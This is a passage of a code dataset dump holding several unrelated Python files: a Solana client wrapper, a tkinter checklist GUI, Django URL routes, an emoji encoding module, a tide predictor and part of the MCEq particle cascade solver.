blockhash_cache_duration\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n # kangda said in Discord: https://discord.com/channels/791995070613159966/836239696467591186/847816026245693451\n # \"I think you are better off doing 4,8,16,20,30\"\n self.retry_pauses: typing.Sequence[Decimal] = [Decimal(4), Decimal(\n 8), Decimal(16), Decimal(20), Decimal(30)]\n\n @staticmethod\n def from_configuration(name: str, cluster_name: str, cluster_url: str, commitment: Commitment, skip_preflight: bool, encoding: str, blockhash_cache_duration: int, instruction_reporter: InstructionReporter) -> \"BetterClient\":\n provider: HTTPProvider = ErrorHandlingProvider(name, cluster_url, instruction_reporter)\n blockhash_cache: typing.Union[BlockhashCache, bool] = False\n if blockhash_cache_duration > 0:\n blockhash_cache = BlockhashCache(blockhash_cache_duration)\n client: Client = Client(cluster_url, commitment=commitment, blockhash_cache=blockhash_cache)\n client._provider = 
provider\n\n return BetterClient(client, name, cluster_name, cluster_url, commitment, skip_preflight, encoding, blockhash_cache_duration, instruction_reporter)\n\n def get_balance(self, pubkey: typing.Union[PublicKey, str], commitment: Commitment = UnspecifiedCommitment) -> Decimal:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_balance(pubkey, resolved_commitment)\n value = Decimal(response[\"result\"][\"value\"])\n return value / SOL_DECIMAL_DIVISOR\n\n def get_account_info(self, pubkey: typing.Union[PublicKey, str], commitment: Commitment = UnspecifiedCommitment,\n encoding: str = UnspecifiedEncoding, data_slice: typing.Optional[DataSliceOpts] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_account_info(pubkey, resolved_commitment, resolved_encoding, data_slice)\n return response[\"result\"]\n\n def get_confirmed_signatures_for_address2(self, account: typing.Union[str, Keypair, PublicKey], before: typing.Optional[str] = None, until: typing.Optional[str] = None, limit: typing.Optional[int] = None) -> typing.Sequence[str]:\n response = self.compatible_client.get_confirmed_signature_for_address2(account, before, until, limit)\n return [result[\"signature\"] for result in response[\"result\"]]\n\n def get_confirmed_transaction(self, signature: str, encoding: str = \"json\") -> typing.Any:\n _, resolved_encoding = self.__resolve_defaults(None, encoding)\n response = self.compatible_client.get_confirmed_transaction(signature, resolved_encoding)\n return response[\"result\"]\n\n def get_minimum_balance_for_rent_exemption(self, size: int, commitment: Commitment = UnspecifiedCommitment) -> int:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_minimum_balance_for_rent_exemption(size, resolved_commitment)\n return int(response[\"result\"])\n\n def get_program_accounts(self, pubkey: typing.Union[str, PublicKey],\n commitment: Commitment = UnspecifiedCommitment,\n encoding: typing.Optional[str] = UnspecifiedEncoding,\n data_slice: typing.Optional[DataSliceOpts] = None,\n data_size: typing.Optional[int] = None,\n memcmp_opts: typing.Optional[typing.List[MemcmpOpts]] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_program_accounts(\n pubkey, resolved_commitment, resolved_encoding, data_slice, data_size, memcmp_opts)\n return response[\"result\"]\n\n def get_recent_blockhash(self, commitment: Commitment = UnspecifiedCommitment) -> Blockhash:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_recent_blockhash(resolved_commitment)\n return Blockhash(response[\"result\"][\"value\"][\"blockhash\"])\n\n def get_token_account_balance(self, pubkey: typing.Union[str, PublicKey], commitment: Commitment = UnspecifiedCommitment) -> Decimal:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_token_account_balance(pubkey, resolved_commitment)\n value = Decimal(response[\"result\"][\"value\"][\"amount\"])\n decimal_places = response[\"result\"][\"value\"][\"decimals\"]\n divisor = Decimal(10 ** decimal_places)\n return value / divisor\n\n def get_token_accounts_by_owner(self, owner: PublicKey, token_account_options: TokenAccountOpts, commitment: Commitment = UnspecifiedCommitment,) -> typing.Any:\n 
resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_token_accounts_by_owner(owner, token_account_options, resolved_commitment)\n return response[\"result\"][\"value\"]\n\n def get_multiple_accounts(self, pubkeys: typing.List[typing.Union[PublicKey, str]], commitment: Commitment = UnspecifiedCommitment,\n encoding: str = UnspecifiedEncoding, data_slice: typing.Optional[DataSliceOpts] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_multiple_accounts(\n pubkeys, resolved_commitment, resolved_encoding, data_slice)\n return response[\"result\"][\"value\"]\n\n def send_transaction(self, transaction: Transaction, *signers: Keypair, opts: TxOpts = TxOpts(preflight_commitment=UnspecifiedCommitment)) -> str:\n proper_commitment: Commitment = opts.preflight_commitment\n if proper_commitment == UnspecifiedCommitment:\n proper_commitment = self.commitment\n\n proper_opts = TxOpts(preflight_commitment=proper_commitment,\n skip_confirmation=opts.skip_confirmation,\n skip_preflight=opts.skip_preflight)\n\n response = self.compatible_client.send_transaction(transaction, *signers, opts=proper_opts)\n return str(response[\"result\"])\n\n def wait_for_confirmation(self, transaction_ids: typing.Sequence[str], max_wait_in_seconds: int = 60) -> typing.Sequence[str]:\n self.logger.info(f\"Waiting up to {max_wait_in_seconds} seconds for {transaction_ids}.\")\n all_confirmed: typing.List[str] = []\n start_time: datetime.datetime = datetime.datetime.now()\n cutoff: datetime.datetime = start_time + datetime.timedelta(seconds=max_wait_in_seconds)\n for transaction_id in transaction_ids:\n while datetime.datetime.now() < cutoff:\n time.sleep(1)\n confirmed = self.get_confirmed_transaction(transaction_id)\n if confirmed is not None:\n self.logger.info(\n f\"Confirmed {transaction_id} after {datetime.datetime.now() - start_time} seconds.\")\n all_confirmed += [transaction_id]\n break\n\n if len(all_confirmed) != len(transaction_ids):\n self.logger.info(f\"Timed out after {max_wait_in_seconds} seconds waiting on transaction {transaction_id}.\")\n return all_confirmed\n\n def __resolve_defaults(self, commitment: typing.Optional[Commitment], encoding: typing.Optional[str] = None) -> typing.Tuple[Commitment, str]:\n if commitment is None or commitment == UnspecifiedCommitment:\n commitment = self.commitment\n\n if encoding is None or encoding == UnspecifiedEncoding:\n encoding = self.encoding\n\n return commitment, encoding\n\n def __str__(self) -> str:\n return f\"« 𝙱𝚎𝚝𝚝𝚎𝚛𝙲𝚕𝚒𝚎𝚗𝚝 [{self.cluster_name}]: {self.cluster_url} »\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n","repo_name":"liqprotocol/mango-explorer","sub_path":"mango/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26834502782","text":"from tkinter import *\nimport reinigungsplancheckliste as cl\n\ndef Auswahlbereich(tkFenster0):\n # Header\n global T0\n T0 = Label(master=tkFenster0, text=\"Cafe - Checklisten\")\n T0.config(bg='#342216', fg=\"white\", font=(\"bold\", 26), borderwidth=0)\n T0.place(x=0, y=0, width=550, height=50)\n\n # Selection area label\n global T2\n T2 = Label(master=tkFenster0, text=\"Auswahlbereich\")\n T2.config(bg='#403027', fg=\"white\", font=(\"bold\", 14), borderwidth=0)\n T2.place(x=0, y=60, width=550, 
height=50)\n\n # Button that opens the cleaning schedule\n global button0\n button0 = Button(master=tkFenster0, text=\"Reinigungsplan\", font=(\"bold\", 14), command=lambda: [cl.checkliste(tkFenster0), rplan_button()])\n button0.place(x=175, y=175, width=200, height=50)\n\ndef rplan_button():\n print(\"Hallo\")\n T2.destroy()\n button0.destroy()","repo_name":"mfroemmi/Cafe-Checkliste","sub_path":"auswahlbereich.py","file_name":"auswahlbereich.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74297152835","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^about/$', views.about),\n url(r'^article/$', views._Article.as_view()),\n url(r'^article/(?P<id>\d+)', views.article_detail),\n url(r'^article_detail/$', views.article_detail),\n url(r'^mood/$', views._Mood.as_view()),\n url(r'^search/$', views.Search.as_view()),\n url(r'^class/(?P<id>\d+)', views.Class),\n url(r'^tag/(?P<id>\d+)', views.tag),\n]\n\n","repo_name":"BrightHao/easy_blog","sub_path":"demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18291409789","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author: alisue\n# Date: 2011/03/24\n#\n# Ref: https://bitbucket.org/tokibito/django-bpmobile/src/7a09b1dea05c/bpmobile/utils.py\n# Ref: http://code.google.com/p/emoji4unicode/source/browse/trunk/src/carrier_data.py\n#\nfrom utils import code_to_unicode, code_to_sjis, get_range_from_code\nfrom thumbnails import get_docomo_thumbnail_urls, get_kddi_thumbnail_urls, get_softbank_thumbnail_urls\n\nclass Code(object):\n _name = None\n def __init__(self, e, fallback=None):\n self._id = e.get('id')\n code = e.get(self._name, None)\n if code:\n if code.startswith('>'):\n code = code[1:]\n self._duplicate = True\n else:\n self._duplicate = False\n self._code = code\n self._unicode = code_to_unicode(code)\n else:\n self._code = None\n self._unicode = None\n self._fallback = fallback\n def __unicode__(self):\n return self.unicode\n keyable = property(lambda self: self.code and not self.duplicate)\n duplicate = property(lambda self: self._duplicate)\n code = property(lambda self: self._code)\n unicode = property(lambda self: self._unicode or self.fallback)\n fallback = property(lambda self: self._fallback)\n\nclass Carrier(Code):\n _code_to_sjis_code_ranges = None\n def __init__(self, e, fallback):\n super(Carrier, self).__init__(e, fallback)\n if self.code:\n self._sjis_code = self._code_to_sjis_code(self.code)\n self._sjis = code_to_sjis(self._sjis_code)\n else:\n self._sjis_code = None\n self._sjis = None\n def _code_to_sjis_code(self, code):\n if not code:\n return None\n result = []\n for c in code.split(\"+\"):\n c = int(c, 16)\n range = get_range_from_code(c, self._code_to_sjis_code_ranges)\n offset = c - range[0]\n dst = range[2] + offset\n result.append(\"%04X\" % dst)\n return '+'.join(result)\n sjis_code = property(lambda self: self._sjis_code)\n sjis = property(lambda self: self._sjis or self.fallback.encode('cp932'))\n usjis = property(lambda self: self.sjis.decode('cp932', 'replace') or self.fallback)\n \n def _get_thumbnail_urls(self):\n raise NotImplementedError\n def _get_thumbnail_img(self):\n img = r\"\"\"<img src=\"%s\" alt=\"%s\" title=\"%s\" />\"\"\"\n fallback = self.fallback\n urls = self._get_thumbnail_urls()\n if urls is None:\n return fallback\n results = []\n for url 
in urls:\n results.append(img % (url, fallback, fallback))\n return u''.join(results)\n thumbnail = property(_get_thumbnail_img)\n \nclass Unicode(Code):\n _name = 'unicode'\n _encoding = 'utf8'\nclass Google(Code):\n _name = 'google'\n _encoding = 'utf8'\nclass DoCoMo(Carrier):\n _name = 'docomo'\n _encoding = 'cp932'\n _code_to_sjis_code_ranges = (\n (0xE63E, 0xE69B, 0xF89F, 0xF8FC),\n (0xE69C, 0xE6DA, 0xF940, 0xF97E),\n (0xE6DB, 0xE757, 0xF980, 0xF9FC),\n )\n _code_to_docomo_id_ranges = (\n (0xE63E, 0xE6A5, 0x0001, 0x0068),\n (0xE6AC, 0xE6AE, 0x00A7, 0x00A9),\n (0xE6B1, 0xE6B3, 0x00AA, 0x00AC),\n (0xE6B7, 0xE6BA, 0x00AD, 0x00B0),\n (0xE6CE, 0xE6EB, 0x0069, 0x0086),\n (0xE6EC, 0xE70A, 0x0088, 0x00A6),\n (0xE70B, 0xE70B, 0x0087, 0x0087),\n (0xE70C, 0xE757, 0x0001, 0x004C),\n )\n\n def __unicode__(self):\n return self.usjis\n _get_thumbnail_urls = get_docomo_thumbnail_urls\n \nclass KDDI(Carrier):\n _name = 'kddi'\n _encoding = 'cp932'\n _code_to_sjis_code_ranges = (\n (0xE468, 0xE4A6, 0xF640, 0xF67E),\n (0xE4A7, 0xE523, 0xF680, 0xF6FC),\n (0xE524, 0xE562, 0xF740, 0xF77E),\n (0xE563, 0xE5B4, 0xF780, 0xF7D1),\n (0xE5B5, 0xE5CC, 0xF7E5, 0xF7FC),\n (0xE5CD, 0xE5DF, 0xF340, 0xF352),\n (0xEA80, 0xEAAB, 0xF353, 0xF37E),\n (0xEAAC, 0xEAFA, 0xF380, 0xF3CE),\n (0xEAFB, 0xEB0D, 0xF7D2, 0xF7E4),\n (0xEB0E, 0xEB3B, 0xF3CF, 0xF3FC),\n (0xEB3C, 0xEB7A, 0xF440, 0xF47E),\n (0xEB7B, 0xEB8E, 0xF480, 0xF493), \n )\n def __unicode__(self):\n return self.usjis\n _get_thumbnail_urls = get_kddi_thumbnail_urls\n \nclass SoftBank(Carrier):\n _name = 'softbank'\n _encoding = 'utf8'\n _code_to_sjis_code_ranges = (\n (0xE001, 0xE03E, 0xF941, 0xF97E),\n (0xE03F, 0xE05A, 0xF980, 0xF99B),\n (0xE101, 0xE15A, 0xF741, 0xF79B),\n (0xE201, 0xE25A, 0xF7A1, 0xF7FA),\n (0xE301, 0xE34D, 0xF9A1, 0xF9ED),\n (0xE401, 0xE44C, 0xFB41, 0xFB8D),\n (0xE501, 0xE53E, 0xFBA1, 0xFBDE),\n )\n \n _get_thumbnail_urls = get_softbank_thumbnail_urls","repo_name":"lambdalisue/e4u","sub_path":"e4u/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"42100355064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 19 14:25:56 2021\n\n@author: ormondt\n\"\"\"\n\nimport cht_tide.constituent as cons\nfrom cht_tide.tide import Tide\n\n\ndef predict(data, times):\n all_constituents = [c for c in cons.noaa if c != cons._Z0]\n\n constituents = []\n for name in data.index.to_list():\n if name == \"MM\":\n name = \"Mm\"\n if name == \"MF\":\n name = \"Mf\"\n if name == \"SA\":\n name = \"Sa\"\n if name == \"SSA\":\n name = \"Ssa\"\n if name == \"MU2\":\n name = \"mu2\"\n if name == \"NU2\":\n name = \"nu2\"\n for cnst in all_constituents:\n if cnst.name == name:\n constituents.append(cnst)\n continue\n\n td = Tide(\n constituents=constituents,\n amplitudes=data.iloc[:, 0].to_list(),\n phases=data.iloc[:, 1].to_list(),\n )\n v = td.at(times)\n\n return v\n","repo_name":"Deltares/cht_tide","sub_path":"cht_tide/tide_predict.py","file_name":"tide_predict.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087889958","text":"import os\nimport six\nfrom time import time\nimport numpy as np\nimport mceq_config as config\nfrom MCEq.misc import normalize_hadronic_model_name, info\nfrom MCEq.particlemanager import ParticleManager\nimport MCEq.data\n\n\nclass MCEqRun(object):\n \"\"\"Main class for handling the calculation.\n\n 
This class is the main user interface for the calculation. It will\n handle initialization and various error/configuration checks. The\n setup has to be accomplished before invoking the integration routine\n :func:`MCEqRun.solve`. Changes of configuration, such as:\n\n - interaction model in :meth:`MCEqRun.set_interaction_model`,\n - primary flux in :func:`MCEqRun.set_primary_model`,\n - zenith angle in :func:`MCEqRun.set_theta_deg`,\n - density profile in :func:`MCEqRun.set_density_model`,\n - member particles of the special ``obs_`` group in :func:`MCEqRun.set_obs_particles`,\n\n can be made on an active instance of this class, while calling\n :func:`MCEqRun.solve` subsequently to calculate the solution\n corresponding to the settings.\n\n The result can be retrieved by calling :func:`MCEqRun.get_solution`.\n\n\n Args:\n interaction_model (string): name of the hadronic interaction model\n density_model (string, string, string): model type, location, season\n primary_model (class, param_tuple): classes derived from\n :class:`crflux.models.PrimaryFlux` and its parameters as tuple\n theta_deg (float): zenith angle :math:`\\theta` in degrees,\n measured positively from vertical direction\n adv_set (dict): advanced settings, see :mod:`mceq_config`\n obs_ids (list): list of particle name strings. Those lepton decay\n products will be scored in the special ``obs_`` categories\n \"\"\"\n\n def __init__(self, interaction_model, primary_model, theta_deg, **kwargs):\n\n self._mceq_db = MCEq.data.HDF5Backend()\n\n interaction_model = normalize_hadronic_model_name(interaction_model)\n\n # Save atmospheric parameters\n self.density_config = kwargs.pop('density_model', config.density_model)\n self.theta_deg = theta_deg\n\n #: Interface to interaction tables of the HDF5 database\n self._interactions = MCEq.data.Interactions(mceq_hdf_db=self._mceq_db)\n\n #: handler for cross-section data of type :class:`MCEq.data.HadAirCrossSections`\n self._int_cs = MCEq.data.InteractionCrossSections(\n mceq_hdf_db=self._mceq_db)\n\n #: handler for cross-section data of type :class:`MCEq.data.HadAirCrossSections`\n self._cont_losses = MCEq.data.ContinuousLosses(mceq_hdf_db=self._mceq_db,\n material=config.dedx_material)\n\n #: Interface to decay tables of the HDF5 database\n self._decays = MCEq.data.Decays(mceq_hdf_db=self._mceq_db)\n\n #: Particle manager (initialized/updated in set_interaction_model)\n self.pman = None\n\n # Particle list to keep track of previously initialized particles\n self._particle_list = None\n\n # General Matrix dimensions and shortcuts, controlled by\n # grid of yield matrices\n self._energy_grid = self._mceq_db.energy_grid\n\n # Initialize solution vector\n self._solution = np.zeros(1)\n # Initialize empty state (particle density) vector\n self._phi0 = np.zeros(1)\n # Initialize matrix builder (initialized in set_interaction_model)\n self.matrix_builder = None\n # Save initial condition (primary flux) to restore after dimensional resizing\n self._restore_initial_condition = []\n\n # Set interaction model and compute grids and matrices\n self.set_interaction_model(\n interaction_model,\n particle_list = kwargs.pop('particle_list', None),\n build_matrices = kwargs.pop('build_matrices', True)\n )\n\n # Default GPU device id for CUDA\n self._cuda_device = kwargs.pop('cuda_gpu_id', config.cuda_gpu_id)\n\n # Print particle list after tracking particles have been initialized\n self.pman.print_particle_tables(2)\n\n # Set atmosphere and geometry\n self.integration_path, self.int_grid, self.grid_var = None, None, 
None\n self.set_density_model(self.density_config)\n\n # Set initial flux condition\n if primary_model is not None:\n self.set_primary_model(*primary_model)\n\n @property\n def e_grid(self):\n \"\"\"Energy grid (bin centers)\"\"\"\n return self._energy_grid.c\n\n @property\n def e_bins(self):\n \"\"\"Energy grid (bin edges)\"\"\"\n return self._energy_grid.b\n\n @property\n def e_widths(self):\n \"\"\"Energy grid (bin widths)\"\"\"\n return self._energy_grid.w\n\n @property\n def dim(self):\n \"\"\"Energy grid (dimension)\"\"\"\n return self._energy_grid.d\n\n @property\n def dim_states(self):\n \"\"\"Number of cascade particles times dimension of grid\n (dimension of the equation system)\"\"\"\n return self.pman.dim_states\n \n def closest_energy(self, kin_energy):\n \"\"\"Convenience function to obtain the nearest grid energy\n to the `energy` argument, provided as kinetic energy in the lab frame.\"\"\"\n eidx = (np.abs(self._energy_grid.c - kin_energy)).argmin()\n return self._energy_grid.c[eidx]\n\n def get_solution(self,\n particle_name,\n mag=0.,\n grid_idx=None,\n integrate=False,\n return_as=config.return_as):\n \"\"\"Retrieves solution of the calculation on the energy grid.\n\n Some special prefixes are accepted for lepton names:\n\n - the total flux of muons, muon neutrinos etc. from all sources/mothers\n can be retrieved by the prefix ``total_``, i.e. ``total_numu``\n - the conventional flux of muons, muon neutrinos etc. from all sources\n can be retrieved by the prefix ``conv_``, i.e. ``conv_numu``\n - correspondingly, the flux of leptons which originated from the decay\n of a charged pion carries the prefix ``pi_`` and from a kaon ``k_``\n - conventional leptons originating neither from pion nor from kaon\n decay are collected in a category without any prefix, e.g. ``numu`` or\n ``mu+``\n\n Args:\n particle_name (str): The name of the particle, e.g.\n ``total_mu+`` for the total flux spectrum of positive muons or\n ``pr_antinumu`` for the flux spectrum of prompt anti muon neutrinos\n mag (float, optional): 'magnification factor': the solution is\n multiplied by ``sol`` :math:`= \\Phi \\cdot E^{mag}`\n grid_idx (int, optional): if the integrator has been configured to save\n intermediate solutions on a depth grid, then ``grid_idx`` specifies\n the index of the depth grid for which the solution is retrieved. If\n not specified the flux at the surface is returned\n integrate (bool, optional): return average particle number instead of\n flux (multiply by bin width)\n\n Returns:\n (numpy.array): flux of particles on energy grid :attr:`e_grid`\n \"\"\"\n\n res = np.zeros(self._energy_grid.d)\n ref = self.pman.pname2pref\n sol = None\n if grid_idx is not None and len(self.grid_sol) == 0:\n raise Exception(\n 'Solution has not been computed on grid. 
Check input.')\n if grid_idx is None:\n sol = np.copy(self._solution)\n elif grid_idx >= len(self.grid_sol) or grid_idx is None:\n sol = self.grid_sol[-1, :]\n else:\n sol = self.grid_sol[grid_idx, :]\n\n def sum_lr(lep_str, prefix):\n result = np.zeros(self.dim)\n nsuccess = 0\n for ls in lep_str, lep_str + '_l', lep_str + '_r':\n if prefix + ls not in ref:\n info(\n 15, 'No separate left and right handed particles,',\n 'or, unavailable particle prefix {0}.'.format(prefix +\n ls))\n continue\n result += sol[ref[prefix + ls].lidx:ref[prefix + ls].uidx]\n nsuccess += 1\n if nsuccess == 0 and config.excpt_on_missing_particle:\n raise Exception(\n 'Requested particle {0} not found.'.format(particle_name))\n return result\n\n lep_str = particle_name.split(\n '_')[1] if '_' in particle_name else particle_name\n\n if particle_name.startswith('total_'):\n # Note: This has changed from previous MCEq versions,\n # since pi_ and k_ prefixes are mere tracking counters\n # and no full particle species anymore\n\n res = sum_lr(lep_str, prefix='')\n\n elif particle_name.startswith('conv_'):\n # Note: This changed from previous MCEq versions,\n # conventional is defined as total - prompt\n res = (self.get_solution('total_' + lep_str,\n mag=0,\n grid_idx=grid_idx,\n integrate=False,\n return_as='kinetic energy') -\n self.get_solution('pr_' + lep_str,\n mag=0,\n grid_idx=grid_idx,\n integrate=False,\n return_as='kinetic energy'))\n\n elif particle_name.startswith('pr_'):\n if 'prcas_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='prcas_')\n if 'prres_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='prres_')\n if 'em_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='em_')\n else:\n try:\n res = sum_lr(particle_name, prefix='')\n except KeyError:\n info(10,\n 'Requested particle {0} not found.'.format(particle_name))\n\n # When returning in Etot, interpolate on different grid\n if return_as == 'total energy':\n etot_bins = self.e_bins + ref[lep_str].mass\n etot_grid = np.sqrt(etot_bins[1:] * etot_bins[:-1])\n\n if not integrate:\n return etot_grid, res * etot_grid**mag\n else:\n return etot_grid, res * etot_grid**mag * (etot_bins[1:] -\n etot_bins[:-1])\n\n elif return_as == 'kinetic energy':\n if not integrate:\n return res * self._energy_grid.c**mag\n else:\n return res * self._energy_grid.c**mag * self._energy_grid.w\n\n elif return_as == 'total momentum':\n ptot_bins = np.sqrt((self.e_bins + ref[lep_str].mass)**2 -\n ref[lep_str].mass**2)\n ptot_grid = np.sqrt(ptot_bins[1:] * ptot_bins[:-1])\n dEkindp = ptot_grid / np.sqrt(ptot_grid**2 + ref[lep_str].mass**2)\n res *= dEkindp\n if not integrate:\n return ptot_grid, res * ptot_grid**mag\n else:\n return ptot_grid, res * ptot_grid**mag * (ptot_bins[1:] -\n ptot_bins[:-1])\n\n else:\n raise Exception(\n \"Unknown 'return_as' variable choice.\",\n 'the options are \"kinetic energy\", \"total energy\", \"total momentum\"'\n )\n\n def set_interaction_model(self,\n interaction_model,\n particle_list=None,\n update_particle_list=True,\n force=False,\n build_matrices=True):\n \"\"\"Sets interaction model and/or an external charm model for calculation.\n\n Decay and interaction matrix will be regenerated automatically\n after performing this call.\n\n Args:\n interaction_model (str): name of interaction model\n charm_model (str, optional): name of charm model\n force (bool): force loading interaction model\n \"\"\"\n interaction_model = normalize_hadronic_model_name(interaction_model)\n\n info(1, interaction_model)\n\n if not force and 
(self._interactions.iam == interaction_model\n ) and particle_list == self._particle_list:\n info(2, 'Skip, since current model identical to',\n interaction_model + '.')\n return\n\n self._int_cs.load(interaction_model)\n\n # TODO: simplify this, stuff not needed anymore\n if not update_particle_list and self._particle_list is not None:\n info(10, 'Re-using particle list.')\n self._interactions.load(interaction_model,\n parent_list=self._particle_list)\n self.pman.set_interaction_model(self._int_cs, self._interactions)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n\n elif self._particle_list is None:\n info(10, 'New initialization of particle list.')\n # First initialization\n if particle_list is None:\n self._interactions.load(interaction_model)\n else:\n self._interactions.load(interaction_model,\n parent_list=particle_list)\n\n self._decays.load(parent_list=self._interactions.particles)\n self._particle_list = self._interactions.particles + self._decays.particles\n # Create particle database\n self.pman = ParticleManager(self._particle_list, self._energy_grid,\n self._int_cs)\n self.pman.set_interaction_model(self._int_cs, self._interactions)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n self.matrix_builder = MatrixBuilder(self.pman)\n\n elif (update_particle_list and particle_list != self._particle_list):\n info(10, 'Updating particle list.')\n # Updated particle list received\n if particle_list is None:\n self._interactions.load(interaction_model)\n else:\n self._interactions.load(interaction_model,\n parent_list=particle_list)\n self._decays.load(parent_list=self._interactions.particles)\n self._particle_list = self._interactions.particles + self._decays.particles\n self.pman.set_interaction_model(\n self._int_cs,\n self._interactions,\n updated_parent_list=self._particle_list)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n\n else:\n raise Exception('Should not happen in practice.')\n \n self._resize_vectors_and_restore()\n\n # initialize matrices\n if not build_matrices:\n return\n self.int_m, self.dec_m = self.matrix_builder.construct_matrices(\n skip_decay_matrix=False)\n\n def _resize_vectors_and_restore(self):\n \"\"\"Update solution and grid vectors if the number of particle species\n or the interaction models change. 
The previous state, such as the\n initial spectrum, is restored.\"\"\"\n\n # Update dimensions if particle dimensions changed\n self._phi0 = np.zeros(self.dim_states)\n self._solution = np.zeros(self.dim_states)\n\n # Restore initial condition if present\n if len(self._restore_initial_condition) > 0:\n for con in self._restore_initial_condition:\n con[0](*con[1:])\n\n def set_primary_model(self, mclass, tag):\n \"\"\"Sets primary flux model.\n\n This function is quick and does not require re-generation of\n matrices.\n\n Args:\n mclass (:class:`crflux.models.PrimaryFlux`): reference\n to primary model **class**\n tag (tuple): positional argument list for model class\n \"\"\"\n\n info(1, mclass.__name__, tag if tag is not None else '')\n\n # Save primary flux model for restoration after interaction model changes\n self._restore_initial_condition = [\n (self.set_primary_model, mclass, tag)]\n # Initialize primary model object\n self.pmodel = mclass(tag)\n self.get_nucleon_spectrum = np.vectorize(self.pmodel.p_and_n_flux)\n\n try:\n self.dim_states\n except AttributeError:\n self.finalize_pmodel = True\n\n # Save initial condition\n minimal_energy = 3.\n if (2212, 0) in self.pman:\n e_tot = self._energy_grid.c + self.pman[(2212, 0)].mass\n else:\n info(\n 10,\n 'No protons in eqn system, querying primary flux with kinetic energy.'\n )\n e_tot = self._energy_grid.c\n\n min_idx = np.argmin(np.abs(e_tot - minimal_energy))\n self._phi0 *= 0\n p_top, n_top = self.get_nucleon_spectrum(e_tot[min_idx:])[1:]\n if (2212, 0) in self.pman:\n self._phi0[min_idx + self.pman[(2212, 0)].lidx:self.pman[(\n 2212, 0)].uidx] = 1e-4 * p_top\n else:\n info(\n 1,\n 'Warning: protons not part of equation system, cannot set primary flux.'\n )\n\n if (2112, 0) in self.pman and not self.pman[(2112, 0)].is_resonance:\n self._phi0[min_idx + self.pman[(2112, 0)].lidx:self.pman[(\n 2112, 0)].uidx] = 1e-4 * n_top\n elif (2212, 0) in self.pman:\n info(2, 'Neutrons not part of equation system,',\n 'substituting initial flux with protons.')\n self._phi0[min_idx + self.pman[(2212, 0)].lidx:self.pman[(\n 2212, 0)].uidx] += 1e-4 * n_top\n\n def set_single_primary_particle(self, E, corsika_id=None, pdg_id=None, append=False):\n \"\"\"Set type and kinetic energy of a single primary nucleus for the\n calculation of particle yields.\n\n The function uses the superposition theorem, where the flux of\n a nucleus with mass A and charge Z is modeled by using Z protons\n and A-Z neutrons at energy :math:`E_{nucleon}= E_{nucleus} / A`.\n The nucleus type is defined via :math:`\\text{CORSIKA ID} = A*100 + Z`. For\n example iron has the CORSIKA ID 5626.\n\n Single leptons or hadrons can be defined by specifying `pdg_id` instead of\n `corsika_id`.\n\n The `append` argument can be used to compose an initial state with\n multiple particles. If it is `False` the initial condition is reset to zero\n before adding the particle. 
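For example, injecting a single iron nucleus\n with 1 PeV kinetic energy (illustrative values)::\n\n mceq.set_single_primary_particle(1e6, corsika_id=5626)\n\n 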
A continuous input energy range is allowed between\n :math:`50*A~ \\text{GeV} < E_\\text{nucleus} < 10^{10}*A \\text{GeV}`.\n\n Args:\n E (float): kinetic energy of a nucleus in GeV\n corsika_id (int): ID of a nucleus (see text)\n pdg_id (int): PDG ID of a particle\n append (bool): If True, keep previous state and append a new particle.\n \"\"\"\n import warnings\n from scipy.linalg import solve\n from MCEq.misc import getAZN_corsika, getAZN\n\n if corsika_id and pdg_id:\n raise Exception('Provide either CORSIKA or PDG ID')\n\n info(\n 2, 'CORSIKA ID {0}, PDG ID {1}, energy {2:5.3g} GeV'.format(\n corsika_id, pdg_id, E))\n\n if not append:\n self._restore_initial_condition = [(self.set_single_primary_particle, E,\n corsika_id, pdg_id)]\n self._phi0 *= 0.\n else:\n self._restore_initial_condition.append((self.set_single_primary_particle, E,\n corsika_id, pdg_id))\n egrid = self._energy_grid.c\n ebins = self._energy_grid.b\n ewidths = self._energy_grid.w\n\n if corsika_id:\n n_nucleons, n_protons, n_neutrons = getAZN_corsika(corsika_id)\n elif pdg_id:\n n_nucleons, n_protons, n_neutrons = getAZN(pdg_id)\n\n En = E / float(n_nucleons) if n_nucleons > 0 else E\n\n if En < np.min(self._energy_grid.c):\n raise Exception('energy per nucleon too low for primary ' +\n str(corsika_id))\n\n info(3, ('superposition: n_protons={0}, n_neutrons={1}, ' +\n 'energy per nucleon={2:5.3g} GeV').format(\n n_protons, n_neutrons, En))\n\n cenbin = np.argwhere(En < ebins)[0][0] - 